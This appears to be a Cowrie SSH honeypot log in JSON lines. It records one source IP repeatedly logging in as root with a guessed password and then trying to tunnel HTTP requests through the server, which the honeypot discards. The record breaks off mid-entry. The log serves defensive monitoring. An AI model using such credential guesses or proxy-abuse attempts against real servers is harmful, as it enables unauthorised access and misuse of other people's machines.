{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44058,"dst_ip":"1.2.3.4","dst_port":22,"session":"54ec1d902ea7","protocol":"ssh","message":"New connection: 213.209.150.239:44058 (1.2.3.4:22) [session: 54ec1d902ea7]","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.530946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.531849Z","src_ip":"213.209.150.239","session":"54ec1d902ea7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.579099Z","src_ip":"213.209.150.239","session":"54ec1d902ea7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.814242Z","src_ip":"213.209.150.239","session":"54ec1d902ea7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":4471,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:4471","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.862861Z","session":"54ec1d902ea7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.910177Z","src_ip":"213.209.150.239","session":"54ec1d902ea7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":13730,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:13730","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.045941Z","session":"54ec1d902ea7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.093501Z","src_ip":"213.209.150.239","session":"54ec1d902ea7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.141555Z","src_ip":"213.209.150.239","session":"54ec1d902ea7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44111,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5943c259fdb","protocol":"ssh","message":"New connection: 213.209.150.239:44111 (1.2.3.4:22) [session: a5943c259fdb]","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.187532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.188178Z","src_ip":"213.209.150.239","session":"a5943c259fdb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.235569Z","src_ip":"213.209.150.239","session":"a5943c259fdb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.470031Z","src_ip":"213.209.150.239","session":"a5943c259fdb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":19088,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:19088","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.517964Z","session":"a5943c259fdb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.564992Z","src_ip":"213.209.150.239","session":"a5943c259fdb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":32352,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:32352","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.701434Z","session":"a5943c259fdb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.749125Z","src_ip":"213.209.150.239","session":"a5943c259fdb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.796850Z","src_ip":"213.209.150.239","session":"a5943c259fdb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44166,"dst_ip":"1.2.3.4","dst_port":22,"session":"581dcb543d02","protocol":"ssh","message":"New connection: 213.209.150.239:44166 (1.2.3.4:22) [session: 581dcb543d02]","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.852807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.862597Z","src_ip":"213.209.150.239","session":"581dcb543d02"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:51.910064Z","src_ip":"213.209.150.239","session":"581dcb543d02"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:52.192842Z","src_ip":"213.209.150.239","session":"581dcb543d02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":5136,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:5136","sensor":"my-vps","timestamp":"2025-08-26T01:06:52.250566Z","session":"581dcb543d02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:52.308375Z","src_ip":"213.209.150.239","session":"581dcb543d02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":18980,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18980","sensor":"my-vps","timestamp":"2025-08-26T01:06:52.463117Z","session":"581dcb543d02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:52.519997Z","src_ip":"213.209.150.239","session":"581dcb543d02"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:52.577869Z","src_ip":"213.209.150.239","session":"581dcb543d02"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44224,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d5435ddbe24","protocol":"ssh","message":"New connection: 213.209.150.239:44224 (1.2.3.4:22) [session: 7d5435ddbe24]","sensor":"my-vps","timestamp":"2025-08-26T01:06:52.633569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:52.634307Z","src_ip":"213.209.150.239","session":"7d5435ddbe24"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:52.691071Z","src_ip":"213.209.150.239","session":"7d5435ddbe24"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:52.974339Z","src_ip":"213.209.150.239","session":"7d5435ddbe24"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":29570,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:29570","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.032008Z","session":"7d5435ddbe24"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.088845Z","src_ip":"213.209.150.239","session":"7d5435ddbe24"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":15352,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:15352","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.243192Z","session":"7d5435ddbe24"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.299955Z","src_ip":"213.209.150.239","session":"7d5435ddbe24"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.357618Z","src_ip":"213.209.150.239","session":"7d5435ddbe24"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44278,"dst_ip":"1.2.3.4","dst_port":22,"session":"88ce14210a4f","protocol":"ssh","message":"New connection: 213.209.150.239:44278 (1.2.3.4:22) [session: 88ce14210a4f]","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.403891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.405146Z","src_ip":"213.209.150.239","session":"88ce14210a4f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.452286Z","src_ip":"213.209.150.239","session":"88ce14210a4f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.687686Z","src_ip":"213.209.150.239","session":"88ce14210a4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":7770,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:7770","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.735766Z","session":"88ce14210a4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.783308Z","src_ip":"213.209.150.239","session":"88ce14210a4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":16,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:16","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.917593Z","session":"88ce14210a4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:53.964860Z","src_ip":"213.209.150.239","session":"88ce14210a4f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.012760Z","src_ip":"213.209.150.239","session":"88ce14210a4f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44339,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bb0bc2039c4","protocol":"ssh","message":"New connection: 213.209.150.239:44339 (1.2.3.4:22) [session: 4bb0bc2039c4]","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.068206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.069122Z","src_ip":"213.209.150.239","session":"4bb0bc2039c4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-